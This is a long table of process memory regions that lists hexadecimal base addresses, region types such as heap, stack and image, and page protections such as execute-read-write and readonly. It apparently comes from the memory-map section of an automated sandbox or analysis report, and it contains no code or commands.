|
|
---|---|---|---|---|
690000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
150000
|
unkown
|
page execute and read and write
|
||
260000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
250000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
250000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
240000
|
unkown
|
page execute and read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
160000
|
unkown
|
page execute and read and write
|
||
150000
|
unkown
|
page execute and read and write
|
||
230000
|
unkown
|
page execute and read and write
|
||
160000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
290000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
5C0000
|
heap default
|
page read and write
|
||
170000
|
heap private
|
page read and write
|
||
470000
|
unkown
|
page readonly
|
||
356000
|
unkown
|
page read and write
|
||
374000
|
heap default
|
page read and write
|
||
315D000
|
unkown
|
page read and write
|
||
4F0000
|
unkown
|
page readonly
|
||
34DB000
|
unkown
|
page read and write
|
||
35C2000
|
unkown
|
page read and write
|
||
2AD000
|
heap default
|
page read and write
|
||
1E1000
|
unkown
|
page execute and read and write
|
||
610000
|
unkown
|
page readonly
|
||
D00000
|
heap private
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
350000
|
heap default
|
page read and write
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
A70000
|
unkown
|
page readonly
|
||
3464000
|
unkown
|
page read and write
|
||
2330000
|
unkown
|
page readonly
|
||
28BE000
|
unkown
|
page read and write
|
||
30B0000
|
heap private
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
3163000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page readonly
|
||
5C7000
|
heap default
|
page read and write
|
||
2830000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page read and write
|
||
271000
|
unkown
|
page execute and read and write
|
||
1B830000
|
unkown
|
page readonly
|
||
7EE000
|
unkown
|
page read and write
|
||
1B384000
|
unkown
|
page read and write
|
||
24C000
|
stack
|
page read and write
|
||
520000
|
unkown
|
page readonly
|
||
110000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
28CC000
|
unkown
|
page readonly
|
||
9B000
|
unkown
|
page read and write
|
||
2B0000
|
unkown
|
page readonly
|
||
5F0000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
804000
|
heap private
|
page read and write
|
||
754000
|
heap default
|
page read and write
|
||
B3E000
|
unkown
|
page read and write
|
||
2137000
|
unkown
|
page readonly
|
||
26BE000
|
stack
|
page read and write
|
||
460000
|
unkown
|
page readonly
|
||
5C7000
|
heap default
|
page read and write
|
||
A00000
|
unkown
|
page read and write
|
||
24C0000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page readonly
|
||
780000
|
unkown
|
page read and write
|
||
2D1F000
|
stack
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
231000
|
unkown
|
page execute and read and write
|
||
2820000
|
unkown
|
page readonly
|
||
248000
|
heap private
|
page read and write
|
||
2137000
|
unkown
|
page readonly
|
||
2330000
|
unkown
|
page readonly
|
||
667000
|
heap default
|
page read and write
|
||
2680000
|
unkown
|
page readonly
|
||
2C1D000
|
stack
|
page read and write
|
||
D10000
|
unkown
|
page readonly
|
||
5C0000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
26B0000
|
unkown
|
page readonly
|
||
2CFD000
|
stack
|
page read and write
|
||
7FF00020000
|
unkown
|
page read and write
|
||
7FF001E7000
|
unkown
|
page read and write
|
||
2BA1000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
1EE000
|
heap default
|
page read and write
|
||
25E000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
12CB1000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
564000
|
heap default
|
page read and write
|
||
34C8000
|
unkown
|
page read and write
|
||
390000
|
unkown
|
page readonly
|
||
23C000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
340000
|
unkown
|
page readonly
|
||
CD000
|
unkown
|
page read and write
|
||
2B97000
|
heap private
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
2A16000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page readonly
|
||
12BCC000
|
unkown
|
page read and write
|
||
74E000
|
unkown
|
page read and write
|
||
224000
|
heap private
|
page read and write
|
||
420000
|
unkown
|
page readonly
|
||
1C1000
|
unkown
|
page execute and read and write
|
||
24D0000
|
unkown
|
page readonly
|
||
602000
|
heap default
|
page read and write
|
||
7FF00170000
|
unkown
|
page execute and read and write
|
||
410000
|
unkown
|
page readonly
|
||
2330000
|
unkown
|
page readonly
|
||
2137000
|
unkown
|
page readonly
|
||
590000
|
unkown
|
page readonly
|
||
2C04000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
7FF00112000
|
unkown
|
page execute and read and write
|
||
190000
|
unkown
|
page read and write
|
||
4A0000
|
heap default
|
page read and write
|
||
5E0000
|
unkown
|
page readonly
|
||
30C0000
|
unkown
|
page readonly
|
||
2140000
|
unkown
|
page readonly
|
||
B90000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
7F0000
|
unkown
|
page readonly
|
||
263D000
|
unkown
|
page read and write
|
||
D6000
|
unkown
|
page read and write
|
||
800000
|
heap private
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
25C0000
|
unkown
|
page read and write
|
||
2B9E000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
21D0000
|
unkown
|
page readonly
|
||
27E0000
|
unkown
|
page readonly
|
||
1AC00000
|
unkown
|
page read and write
|
||
1CB000
|
unkown
|
page read and write
|
||
BB000
|
unkown
|
page read and write
|
||
2E80000
|
heap private
|
page read and write
|
||
5AA000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1B0000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
10021000
|
unkown
|
page execute and read and write
|
||
62C000
|
heap default
|
page read and write
|
||
6A0000
|
unkown
|
page readonly
|
||
2BC0000
|
heap private
|
page read and write
|
||
590000
|
unkown
|
page readonly
|
||
130000
|
heap default
|
page read and write
|
||
290000
|
unkown
|
page readonly
|
||
870000
|
heap private
|
page read and write
|
||
34DE000
|
unkown
|
page read and write
|
||
250000
|
heap private
|
page read and write
|
||
9E0000
|
unkown
|
page readonly
|
||
780000
|
heap default
|
page read and write
|
||
A7E000
|
unkown
|
page read and write
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
AB000
|
unkown
|
page read and write
|
||
2AF0000
|
unkown
|
page readonly
|
||
360000
|
heap private
|
page read and write
|
||
1F1000
|
unkown
|
page execute and read and write
|
||
A20000
|
unkown
|
page read and write
|
||
12DF0000
|
unkown
|
page read and write
|
||
990000
|
unkown
|
page read and write
|
||
5E0000
|
heap default
|
page read and write
|
||
6E0000
|
unkown
|
page readonly
|
||
697000
|
heap default
|
page read and write
|
||
267F000
|
stack
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
26AC000
|
unkown
|
page read and write
|
||
2EC000
|
stack
|
page read and write
|
||
2BE0000
|
unkown
|
page write copy
|
||
2137000
|
unkown
|
page readonly
|
||
2CBE000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page write copy
|
||
211000
|
unkown
|
page execute and read and write
|
||
4FD000
|
heap default
|
page read and write
|
||
220000
|
heap private
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
3F0000
|
unkown
|
page readonly
|
||
860000
|
unkown
|
page readonly
|
||
D30000
|
heap private
|
page read and write
|
||
2C4E000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
240000
|
heap default
|
page read and write
|
||
E0000
|
unkown
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
2D6D000
|
stack
|
page read and write
|
||
5F0000
|
heap default
|
page read and write
|
||
34B5000
|
unkown
|
page read and write
|
||
5C0000
|
unkown
|
page readonly
|
||
2D40000
|
heap private
|
page read and write
|
||
4C0000
|
heap default
|
page read and write
|
||
AD0000
|
heap private
|
page read and write
|
||
260000
|
heap private
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
D5000
|
unkown
|
page read and write | page guard
|
||
28C0000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
490000
|
unkown
|
page readonly
|
||
130000
|
unkown
|
page execute and read and write
|
||
2137000
|
unkown
|
page readonly
|
||
150000
|
heap private
|
page read and write
|
||
1C91E000
|
unkown
|
page read and write
|
||
240000
|
heap private
|
page read and write
|
||
17A000
|
stack
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
2137000
|
unkown
|
page readonly
|
||
510000
|
heap default
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
980000
|
unkown
|
page readonly
|
||
660000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
B2E000
|
unkown
|
page read and write
|
||
980000
|
unkown
|
page readonly
|
||
320000
|
heap default
|
page read and write
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
302000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
34E1000
|
unkown
|
page read and write
|
||
220000
|
heap default
|
page read and write
|
||
2330000
|
unkown
|
page readonly
|
||
25C0000
|
unkown
|
page read and write
|
||
1B4B1000
|
unkown
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
6D0000
|
unkown
|
page readonly
|
||
281F000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
2CAE000
|
stack
|
page read and write
|
||
2CCE000
|
stack
|
page read and write
|
||
13D000
|
unkown
|
page read and write
|
||
4E4000
|
heap default
|
page read and write
|
||
7FF00210000
|
unkown
|
page read and write
|
||
6D0000
|
heap default
|
page read and write
|
||
610000
|
unkown
|
page readonly
|
||
15C000
|
unkown
|
page read and write
|
||
2CCE000
|
unkown
|
page read and write
|
||
5E4000
|
heap default
|
page read and write
|
||
940000
|
heap private
|
page read and write
|
||
200000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1AA000
|
stack
|
page read and write
|
||
27FC000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
2F0000
|
heap default
|
page read and write
|
||
2C0000
|
heap default
|
page read and write
|
||
294000
|
heap default
|
page read and write
|
||
320000
|
heap private
|
page read and write
|
||
610000
|
heap default
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
58D000
|
heap default
|
page read and write
|
||
7FF00160000
|
unkown
|
page execute and read and write
|
||
B3D000
|
stack
|
page read and write
|
||
2C0000
|
heap default
|
page read and write
|
||
26E0000
|
heap private
|
page read and write
|
||
A20000
|
heap private
|
page read and write
|
||
CEE000
|
unkown
|
page read and write
|
||
28C7000
|
unkown
|
page readonly
|
||
45E000
|
unkown
|
page read and write
|
||
5F7000
|
heap default
|
page read and write
|
||
2137000
|
unkown
|
page readonly
|
||
2A3D000
|
unkown
|
page read and write
|
||
2740000
|
unkown
|
page write copy
|
||
9F0000
|
unkown
|
page readonly
|
||
1F50000
|
unkown
|
page readonly
|
||
604000
|
heap default
|
page read and write
|
||
5FB000
|
heap default
|
page read and write
|
||
D0000
|
unkown
|
page read and write
|
||
950000
|
unkown
|
page read and write
|
||
287E000
|
stack
|
page read and write
|
||
C8D000
|
unkown
|
page read and write
|
||
1E2B000
|
heap private
|
page read and write
|
||
2AC000
|
stack
|
page read and write
|
||
2EC000
|
stack
|
page read and write
|
||
370000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
270000
|
heap private
|
page read and write
|
||
251000
|
unkown
|
page execute and read and write
|
||
8E0000
|
unkown
|
page read and write
|
||
1B270000
|
unkown
|
page read and write
|
||
460000
|
heap private
|
page read and write
|
||
380000
|
heap private
|
page read and write
|
||
2F7000
|
heap default
|
page read and write
|
||
7FF0001A000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
7FF000E5000
|
unkown
|
page read and write
|
||
A1D000
|
unkown
|
page read and write
|
||
5C0000
|
heap default
|
page read and write
|
||
531000
|
heap default
|
page read and write
|
||
340000
|
heap default
|
page read and write
|
||
4E0000
|
heap private
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page readonly
|
||
410000
|
heap default
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
277000
|
heap default
|
page read and write
|
||
399000
|
heap default
|
page read and write
|
||
33A0000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
594000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page readonly
|
||
34F1000
|
unkown
|
page read and write
|
||
5D0000
|
heap private
|
page read and write
|
||
231000
|
unkown
|
page execute and read and write
|
||
230000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page read and write
|
||
1C99D000
|
unkown
|
page read and write
|
||
497000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
34CE000
|
unkown
|
page read and write
|
||
7FF00250000
|
unkown
|
page execute and read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
2520000
|
unkown
|
page readonly
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
2B60000
|
unkown
|
page readonly
|
||
730000
|
heap default
|
page read and write
|
||
BBE000
|
unkown
|
page read and write
|
||
480000
|
heap private
|
page read and write
|
||
2640000
|
unkown
|
page read and write
|
||
26AF000
|
stack
|
page read and write
|
||
2600000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
360000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page read and write
|
||
370000
|
heap private
|
page read and write
|
||
ADF000
|
stack
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
1B395000
|
unkown
|
page read and write
|
||
1B890000
|
unkown
|
page read and write
|
||
34C5000
|
unkown
|
page read and write
|
||
550000
|
heap default
|
page read and write
|
||
2110000
|
unkown
|
page readonly
|
||
1DF5000
|
heap private
|
page read and write
|
||
1C7AE000
|
unkown
|
page read and write
|
||
A70000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
8B0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
2CFE000
|
stack
|
page read and write
|
||
355B000
|
unkown
|
page read and write
|
||
AF0000
|
unkown
|
page readonly
|
||
61D000
|
heap default
|
page read and write
|
||
356C000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
2620000
|
unkown
|
page read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
1EA000
|
stack
|
page read and write
|
||
40E000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
790000
|
heap private
|
page read and write
|
||
9B0000
|
unkown
|
page readonly
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
597000
|
heap default
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
310E000
|
unkown
|
page read and write
|
||
27F0000
|
unkown
|
page readonly
|
||
150000
|
unkown
|
page read and write
|
||
7FF00022000
|
unkown
|
page execute and read and write
|
||
228000
|
heap private
|
page read and write
|
||
2F2000
|
heap private
|
page read and write
|
||
1B38A000
|
unkown
|
page read and write
|
||
737000
|
heap default
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
557000
|
heap default
|
page read and write
|
||
1B60000
|
unkown
|
page read and write
|
||
2137000
|
unkown
|
page readonly
|
||
29E0000
|
unkown
|
page read and write
|
||
382000
|
unkown
|
page read and write
|
||
B0E000
|
unkown
|
page read and write
|
||
1BC000
|
unkown
|
page read and write
|
||
2540000
|
unkown
|
page readonly
|
||
390000
|
unkown
|
page read and write
|
||
2B3D000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
13C000
|
unkown
|
page read and write
|
||
3562000
|
unkown
|
page read and write
|
||
24A000
|
stack
|
page read and write
|
||
26CF000
|
stack
|
page read and write
|
||
330000
|
heap private
|
page read and write
|
||
160000
|
unkown
|
page read and write
|
||
34CB000
|
unkown
|
page read and write
|
||
4D0000
|
heap default
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
2327000
|
unkown
|
page readonly
|
||
7D0000
|
unkown
|
page readonly
|
||
1DC000
|
stack
|
page read and write
|
||
34A2000
|
unkown
|
page read and write
|
||
7FF00280000
|
unkown
|
page execute and read and write
|
||
770000
|
unkown
|
page readonly
|
||
1B440000
|
unkown
|
page read and write
|
||
390000
|
heap default
|
page read and write
|
||
349C000
|
unkown
|
page read and write
|
||
34AF000
|
unkown
|
page read and write
|
||
550000
|
unkown
|
page readonly
|
||
227000
|
heap default
|
page read and write
|
||
3985000
|
unkown
|
page read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
780000
|
unkown
|
page readonly
|
||
2BD2000
|
unkown
|
page read and write
|
||
16A000
|
stack
|
page read and write
|
||
4E0000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
272000
|
heap private
|
page read and write
|
||
3178000
|
unkown
|
page read and write
|
||
340000
|
unkown
|
page read and write
|
||
2D0000
|
heap private
|
page read and write
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
170000
|
unkown
|
page readonly
|
||
5AD000
|
heap default
|
page read and write
|
||
2F0000
|
heap private
|
page read and write
|
||
349F000
|
unkown
|
page read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
2C50000
|
unkown
|
page write copy
|
||
20000
|
unkown
|
page readonly
|
||
12BA1000
|
unkown
|
page read and write
|
||
1B43D000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
3B7B000
|
unkown
|
page read and write
|
||
5A7000
|
heap default
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
12D11000
|
unkown
|
page read and write
|
||
7FF000D2000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
650000
|
unkown
|
page readonly
|
||
2F0000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
684000
|
heap default
|
page read and write
|
||
2BB000
|
unkown
|
page read and write
|
||
28EB000
|
unkown
|
page readonly
|
||
1F50000
|
unkown
|
page readonly
|
||
26DF000
|
unkown
|
page read and write
|
||
2CED000
|
stack
|
page read and write
|
||
9C0000
|
heap private
|
page read and write
|
||
12E52000
|
unkown
|
page read and write
|
||
2D50000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
C0E000
|
stack
|
page read and write
|
||
24E000
|
heap default
|
page read and write
|
||
390000
|
heap default
|
page read and write
|
||
190000
|
heap private
|
page read and write
|
||
3AAA000
|
unkown
|
page read and write
|
||
34B2000
|
unkown
|
page read and write
|
||
56D000
|
heap default
|
page read and write
|
||
284000
|
heap default
|
page read and write
|
||
654000
|
heap default
|
page read and write
|
||
720000
|
heap default
|
page read and write
|
||
1B0000
|
heap default
|
page read and write
|
||
7FF000EA000
|
unkown
|
page execute and read and write
|
||
570000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page read and write
|
||
27A0000
|
heap private
|
page read and write
|
||
5A0000
|
heap default
|
page read and write
|
||
1C60000
|
heap private
|
page execute and read and write
|
||
2EAE000
|
unkown
|
page read and write
|
||
490000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
32F5000
|
unkown
|
page read and write
|
||
2330000
|
unkown
|
page readonly
|
||
200000
|
unkown
|
page read and write
|
||
614000
|
heap default
|
page read and write
|
||
2730000
|
unkown
|
page write copy
|
||
160000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
2650000
|
unkown
|
page readonly
|
||
390000
|
heap private
|
page read and write
|
||
1DC000
|
stack
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
1BC000
|
unkown
|
page read and write
|
||
52E000
|
unkown
|
page read and write
|
||
76D000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
3D0000
|
unkown
|
page readonly
|
||
130000
|
unkown
|
page execute and read and write
|
||
1E0000
|
heap private
|
page read and write
|
||
27E4000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
810000
|
unkown
|
page readonly
|
||
2620000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
324000
|
heap private
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
34F4000
|
unkown
|
page read and write
|
||
1B90000
|
unkown
|
page readonly
|
||
264E000
|
unkown
|
page read and write
|
||
230000
|
heap private
|
page read and write
|
||
410000
|
unkown
|
page readonly
|
||
A6E000
|
unkown
|
page read and write
|
||
2B90000
|
heap private
|
page read and write
|
||
A2F000
|
unkown
|
page read and write
|
||
2AFE000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
9C0000
|
unkown
|
page readonly
|
||
10021000
|
unkown
|
page execute and read and write
|
||
1CA2E000
|
unkown
|
page read and write
|
||
2B5F000
|
unkown
|
page read and write
|
||
484000
|
heap private
|
page read and write
|
||
790000
|
heap private
|
page read and write
|
||
1B3A0000
|
unkown
|
page read and write
|
||
8B0000
|
unkown
|
page read and write
|
||
1B7000
|
heap default
|
page read and write
|
||
4C7000
|
heap default
|
page read and write
|
||
231000
|
unkown
|
page execute and read and write
|
||
1B48C000
|
unkown
|
page read and write
|
||
32D000
|
heap default
|
page read and write
|
||
7FF00012000
|
unkown
|
page execute and read and write
|
||
8B000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page readonly
|
||
290000
|
unkown
|
page readonly
|
||
2137000
|
unkown
|
page readonly
|
||
670000
|
unkown
|
page read and write
|
||
C4E000
|
unkown
|
page read and write
|
||
6D7000
|
heap default
|
page read and write
|
||
8D0000
|
heap private
|
page read and write
|
||
397000
|
heap private
|
page read and write
|
||
5CD000
|
heap default
|
page read and write
|
||
280000
|
unkown
|
page readonly
|
||
410000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
320000
|
heap private
|
page read and write
|
||
2802000
|
heap private
|
page read and write
|
||
567000
|
heap default
|
page read and write
|
||
9FE000
|
unkown
|
page read and write
|
||
3B0000
|
heap private
|
page read and write
|
||
ADF000
|
stack
|
page read and write
|
||
2A7000
|
heap default
|
page read and write
|
||
1B3B0000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
490000
|
unkown
|
page readonly
|
||
1C640000
|
heap private
|
page read and write
|
||
28A000
|
stack
|
page read and write
|
||
4B0000
|
unkown
|
page readonly
|
||
4B4000
|
heap default
|
page read and write
|
||
2880000
|
unkown
|
page readonly
|
||
1DF0000
|
heap private
|
page read and write
|
||
B0F000
|
stack
|
page read and write
|
||
12BA5000
|
unkown
|
page read and write
|
||
7FF000E0000
|
unkown
|
page read and write
|
||
880000
|
unkown
|
page read and write
|
||
697000
|
heap default
|
page read and write
|
||
7FF00260000
|
unkown
|
page read and write
|
||
220000
|
heap private
|
page read and write
|
||
290000
|
unkown
|
page readonly
|
||
670000
|
unkown
|
page readonly
|
||
1D0000
|
heap private
|
page read and write
|
||
970000
|
heap private
|
page read and write
|
||
260000
|
heap private
|
page read and write
|
||
2330000
|
unkown
|
page readonly
|
||
32EB000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
F0000
|
unkown
|
page write copy
|
||
A44000
|
unkown
|
page read and write
|
||
320000
|
unkown
|
page read and write
|
||
310000
|
heap private
|
page read and write
|
||
580000
|
heap default
|
page read and write
|
||
1B471000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page readonly
|
||
180000
|
unkown
|
page execute and read and write
|
||
BC000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page read and write
|
||
1BA2E000
|
unkown
|
page read and write
|
||
7FF00180000
|
unkown
|
page read and write
|
||
327000
|
heap default
|
page read and write
|
||
2E0E000
|
stack
|
page read and write
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
4F7000
|
heap default
|
page read and write
|
||
28000
|
heap private
|
page read and write
|
||
25C000
|
unkown
|
page read and write
|
||
537000
|
heap default
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
2D3F000
|
stack
|
page read and write
|
||
822000
|
heap private
|
page read and write
|
||
211000
|
unkown
|
page execute and read and write
|
||
10B000
|
unkown
|
page read and write
|
||
54E000
|
stack
|
page read and write
|
||
3157000
|
unkown
|
page read and write
|
||
508000
|
heap default
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
1BA90000
|
heap private
|
page read and write
|
||
5B4000
|
heap default
|
page read and write
|
||
5E0000
|
heap default
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
1A0000
|
unkown
|
page read and write
|
||
2CB0000
|
unkown
|
page write copy
|
||
3A0000
|
heap default
|
page read and write
|
||
617000
|
heap default
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
30E000
|
stack
|
page read and write
|
||
1C570000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
36A000
|
heap default
|
page read and write
|
||
710000
|
unkown
|
page readonly
|
||
314000
|
heap default
|
page read and write
|
||
7FF00150000
|
unkown
|
page read and write
|
||
2D0000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
5FD000
|
heap default
|
page read and write
|
||
261000
|
unkown
|
page execute and read and write
|
||
1E70000
|
unkown
|
page readonly
|
||
668000
|
unkown
|
page read and write
|
||
2330000
|
unkown
|
page readonly
|
||
AEC000
|
unkown
|
page read and write
|
||
34E4000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
160000
|
heap default
|
page read and write
|
||
720000
|
heap private
|
page read and write
|
||
281000
|
unkown
|
page execute and read and write
|
||
160000
|
heap private
|
page read and write
|
||
2600000
|
unkown
|
page readonly
|
||
262000
|
heap private
|
page read and write
|
||
1B39A000
|
unkown
|
page read and write
|
||
630000
|
unkown
|
page readonly
|
||
2137000
|
unkown
|
page readonly
|
||
170000
|
unkown
|
page readonly
|
||
2620000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page execute and read and write
|
||
21CD000
|
unkown
|
page read and write
|
||
4C7000
|
heap default
|
page read and write
|
||
254000
|
heap private
|
page read and write
|
||
38F000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
22F7000
|
unkown
|
page readonly
|
||
27E0000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
A3F000
|
unkown
|
page read and write
|
||
2F6000
|
heap default
|
page read and write
|
||
490000
|
unkown
|
page readonly
|
||
5E1000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
1DAF000
|
unkown
|
page read and write
|
||
FB000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page read and write
|
||
7FF0002C000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
B0000
|
heap private
|
page read and write
|
||
2930000
|
unkown
|
page readonly
|
||
25CD000
|
unkown
|
page read and write
|
||
7B0000
|
unkown
|
page readonly
|
||
310000
|
unkown
|
page readonly
|
||
2620000
|
unkown
|
page read and write
|
||
27A4000
|
heap private
|
page read and write
|
||
1BA30000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
7FF001F0000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
1BA30000
|
unkown
|
page read and write
|
||
26C0000
|
unkown
|
page readonly
|
||
